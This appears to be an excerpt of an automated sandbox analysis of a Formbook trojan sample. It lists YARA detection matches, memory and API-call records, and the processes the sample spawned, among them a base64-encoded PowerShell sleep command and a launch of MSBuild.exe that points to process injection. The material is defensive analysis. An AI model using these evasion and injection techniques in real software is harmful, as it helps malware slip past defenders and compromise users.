                Source: 00000004.00000000.449196395.000000000C907000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000004.00000000.449196395.000000000C907000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 00000003.00000002.485479676.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000003.00000002.485479676.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 00000007.00000002.830332751.0000000004090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000007.00000002.830332751.0000000004090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 00000003.00000002.485989936.0000000000C10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exeCode function: 0_2_018199D00_2_018199D0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exeCode function: 0_2_018142E80_2_018142E8
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exeCode function: 0_2_018142F80_2_018142F8
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exeCode function: 0_2_018147080_2_01814708
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exeCode function: 0_2_018147180_2_01814718
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010AF9003_2_010AF900
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C41203_2_010C4120
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_011610023_2_01161002
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0117E8243_2_0117E824
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010BB0903_2_010BB090
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010D20A03_2_010D20A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_011720A83_2_011720A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_011728EC3_2_011728EC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01172B283_2_01172B28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010DEBB03_2_010DEBB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0116DBD23_2_0116DBD2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_011722AE3_2_011722AE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01172D073_2_01172D07
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010A0D203_2_010A0D20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01171D553_2_01171D55
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010D25813_2_010D2581
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_011725DD3_2_011725DD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010BD5E03_2_010BD5E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010B841F3_2_010B841F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0116D4663_2_0116D466
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01171FF13_2_01171FF1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0116D6163_2_0116D616
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C6E303_2_010C6E30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01172EF73_2_01172EF7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_004058433_2_00405843
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_004018093_2_00401809
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_004018103_2_00401810
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_004038C33_2_004038C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_00403B8E3_2_00403B8E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_00401B9A3_2_00401B9A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_00401BA03_2_00401BA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_004206633_2_00420663
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0040561C3_2_0040561C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_004056233_2_00405623
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0040BFF33_2_0040BFF3
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_043F841F7_2_043F841F
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_044A10027_2_044A1002
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_043FB0907_2_043FB090
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_043E0D207_2_043E0D20
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_044B1D557_2_044B1D55
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_043EF9007_2_043EF900
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_044041207_2_04404120
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_043FD5E07_2_043FD5E0
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04406E307_2_04406E30
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0441EBB07_2_0441EBB0
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_029B8D707_2_029B8D70
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_029B1AD07_2_029B1AD0
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_029D021A7_2_029D021A
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_029BA2007_2_029BA200
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_029B3A507_2_029B3A50
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_029D10CB7_2_029D10CB
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_029B38307_2_029B3830
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_029B38297_2_029B3829
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_029CE8707_2_029CE870
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_029D01287_2_029D0128
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_029D07B07_2_029D07B0
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_029B1D9B7_2_029B1D9B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 010AB150 appears 35 times
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 043EB150 appears 32 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010E9910 NtAdjustPrivilegesToken,LdrInitializeThunk,3_2_010E9910
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010E99A0 NtCreateSection,LdrInitializeThunk,3_2_010E99A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010E9840 NtDelayExecution,LdrInitializeThunk,3_2_010E9840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010E9860 NtQuerySystemInformation,LdrInitializeThunk,3_2_010E9860
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010E98F0 NtReadVirtualMemory,LdrInitializeThunk,3_2_010E98F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010E9A00 NtProtectVirtualMemory,LdrInitializeThunk,3_2_010E9A00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010E9A20 NtResumeThread,LdrInitializeThunk,3_2_010E9A20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010E9A50 NtCreateFile,LdrInitializeThunk,3_2_010E9A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010E9540 NtReadFile,LdrInitializeThunk,3_2_010E9540
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010E95D0 NtClose,LdrInitializeThunk,3_2_010E95D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010E9710 NtQueryInformationToken,LdrInitializeThunk,3_2_010E9710
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010E9780 NtMapViewOfSection,LdrInitializeThunk,3_2_010E9780
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010E97A0 NtUnmapViewOfSection,LdrInitializeThunk,3_2_010E97A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010E9FE0 NtCreateMutant,LdrInitializeThunk,3_2_010E9FE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010E9660 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_010E9660
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010E96E0 NtFreeVirtualMemory,LdrInitializeThunk,3_2_010E96E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010E9950 NtQueueApcThread,3_2_010E9950
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010E99D0 NtCreateProcessEx,3_2_010E99D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010E9820 NtEnumerateKey,3_2_010E9820
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010EB040 NtSuspendThread,3_2_010EB040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010E98A0 NtWriteVirtualMemory,3_2_010E98A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010E9B00 NtSetValueKey,3_2_010E9B00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010EA3B0 NtGetContextThread,3_2_010EA3B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010E9A10 NtQuerySection,3_2_010E9A10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010E9A80 NtOpenDirectoryObject,3_2_010E9A80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010E9520 NtWaitForSingleObject,3_2_010E9520
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010EAD30 NtSetContextThread,3_2_010EAD30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010E9560 NtWriteFile,3_2_010E9560
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010E95F0 NtQueryInformationFile,3_2_010E95F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010EA710 NtOpenProcessToken,3_2_010EA710
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010E9730 NtQueryVirtualMemory,3_2_010E9730
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010E9760 NtOpenProcess,3_2_010E9760
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010EA770 NtOpenThread,3_2_010EA770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010E9770 NtSetInformationFile,3_2_010E9770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010E9610 NtEnumerateValueKey,3_2_010E9610
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010E9650 NtQueryValueKey,3_2_010E9650
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010E9670 NtQueryInformationProcess,3_2_010E9670
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010E96D0 NtCreateKey,3_2_010E96D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0041E533 NtCreateFile,3_2_0041E533
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0041E5E3 NtReadFile,3_2_0041E5E3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0041E663 NtClose,3_2_0041E663
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0041E713 NtAllocateVirtualMemory,3_2_0041E713
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04429840 NtDelayExecution,LdrInitializeThunk,7_2_04429840
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04429860 NtQuerySystemInformation,LdrInitializeThunk,7_2_04429860
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04429540 NtReadFile,LdrInitializeThunk,7_2_04429540
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04429560 NtWriteFile,LdrInitializeThunk,7_2_04429560
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04429910 NtAdjustPrivilegesToken,LdrInitializeThunk,7_2_04429910
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_044295D0 NtClose,LdrInitializeThunk,7_2_044295D0
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_044299A0 NtCreateSection,LdrInitializeThunk,7_2_044299A0
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04429650 NtQueryValueKey,LdrInitializeThunk,7_2_04429650
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04429A50 NtCreateFile,LdrInitializeThunk,7_2_04429A50
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04429660 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_04429660
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04429610 NtEnumerateValueKey,LdrInitializeThunk,7_2_04429610
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_044296D0 NtCreateKey,LdrInitializeThunk,7_2_044296D0
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_044296E0 NtFreeVirtualMemory,LdrInitializeThunk,7_2_044296E0
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04429710 NtQueryInformationToken,LdrInitializeThunk,7_2_04429710
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04429FE0 NtCreateMutant,LdrInitializeThunk,7_2_04429FE0
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04429780 NtMapViewOfSection,LdrInitializeThunk,7_2_04429780
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0442B040 NtSuspendThread,7_2_0442B040
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04429820 NtEnumerateKey,7_2_04429820
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_044298F0 NtReadVirtualMemory,7_2_044298F0
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_044298A0 NtWriteVirtualMemory,7_2_044298A0
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04429950 NtQueueApcThread,7_2_04429950
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04429520 NtWaitForSingleObject,7_2_04429520
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0442AD30 NtSetContextThread,7_2_0442AD30
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_044299D0 NtCreateProcessEx,7_2_044299D0
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_044295F0 NtQueryInformationFile,7_2_044295F0
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04429670 NtQueryInformationProcess,7_2_04429670
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04429A00 NtProtectVirtualMemory,7_2_04429A00
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04429A10 NtQuerySection,7_2_04429A10
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04429A20 NtResumeThread,7_2_04429A20
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04429A80 NtOpenDirectoryObject,7_2_04429A80
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04429760 NtOpenProcess,7_2_04429760
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04429770 NtSetInformationFile,7_2_04429770
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0442A770 NtOpenThread,7_2_0442A770
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04429B00 NtSetValueKey,7_2_04429B00
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0442A710 NtOpenProcessToken,7_2_0442A710
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04429730 NtQueryVirtualMemory,7_2_04429730
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_044297A0 NtUnmapViewOfSection,7_2_044297A0
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0442A3B0 NtGetContextThread,7_2_0442A3B0
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_029CC840 NtDeleteFile,7_2_029CC840
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_029CC870 NtClose,7_2_029CC870
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_029CC920 NtAllocateVirtualMemory,7_2_029CC920
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_029CC7F0 NtReadFile,7_2_029CC7F0
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_029CC740 NtCreateFile,7_2_029CC740
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_029CC83D NtDeleteFile,7_2_029CC83D
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_029CC91C NtAllocateVirtualMemory,7_2_029CC91C
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_029CC7EA NtReadFile,7_2_029CC7EA
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_029CC73A NtCreateFile,7_2_029CC73A
                Source: SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe, 00000000.00000003.303083113.00000000043C6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameHvhdjxt.dll" vs SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe
                Source: SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe, 00000000.00000002.392159884.0000000004508000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe
                Source: SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe, 00000000.00000002.387303742.000000000151B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe
                Source: SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe, 00000000.00000002.390068915.0000000003450000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe
                Source: SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe, 00000000.00000002.389628411.00000000033A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe
                Source: SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe, 00000000.00000003.303493629.0000000004637000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameHvhdjxt.dll" vs SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe
                Source: SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe, 00000000.00000002.389107599.00000000032B0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameHvhdjxt.dll" vs SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe
                Source: SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe, 00000000.00000000.302434601.0000000000D42000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSlip-12-27.exe" vs SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe
                Source: SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: cloud.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exeReversingLabs: Detection: 35%
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exeJump to behavior
                Source: SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe purecrypter.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe purecrypter.exeJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
